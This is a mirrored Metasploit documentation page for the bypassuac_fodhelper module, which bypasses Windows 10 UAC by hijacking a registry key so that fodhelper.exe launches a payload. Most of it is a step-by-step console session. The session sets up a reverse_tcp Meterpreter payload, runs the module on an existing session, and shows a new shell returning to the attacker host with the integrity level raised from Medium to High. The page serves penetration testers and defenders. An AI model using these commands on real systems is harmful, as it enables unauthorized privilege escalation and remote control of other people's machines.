CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
Views: 1904

Vulnerable Application

Introduction

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off.

This module modifies a registry key, but cleans up the key once the payload has been invoked.

The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

Usage

You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the payload and session options. The module use an hardcoded timeout of 5 seconds during which it expects fodhelper.exe to be launched on the target system. On slower system this may be too short, resulting in no session being created. In this case disable the automatic payload handler (set DISABLEPAYLOADHANDLER true) and manually create a job handler corresponding to the payload.

Scenarios

msf > 
[*] Sending stage (1189423 bytes) to 192.168.50.4
[*] Meterpreter session 11 opened (192.168.50.1:4444 -> 192.168.50.4:1654) at 2017-05-22 19:10:43 +0100

msf > sessions -i 11
[*] Starting interaction with 11...

meterpreter > shell
Process 9496 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\sasha\Desktop>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192                                                                                     

C:\Users\sasha\Desktop>exit
exit
meterpreter > 
Background session 11? [y/N]  
msf > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set SESSION 11
SESSION => 11
msf exploit(bypassuac_fodhelper) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64


msf exploit(bypassuac_fodhelper) > set target 0
target => 0
msf exploit(bypassuac_fodhelper) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on 192.168.50.1:4445 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\WINDOWS\system32\cmd.exe /c C:\WINDOWS\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to 192.168.50.4
[*] Meterpreter session 12 opened (192.168.50.1:4445 -> 192.168.50.4:1655) at 2017-05-22 19:12:03 +0100
[*] Cleaining up registry keys ...

meterpreter > shell
Process 4076 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami /all | findstr /C:"Mandatory Label"
whoami /all | findstr /C:"Mandatory Label"
ERROR: Unable to get user claims information.
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                                                                 

C:\WINDOWS\system32>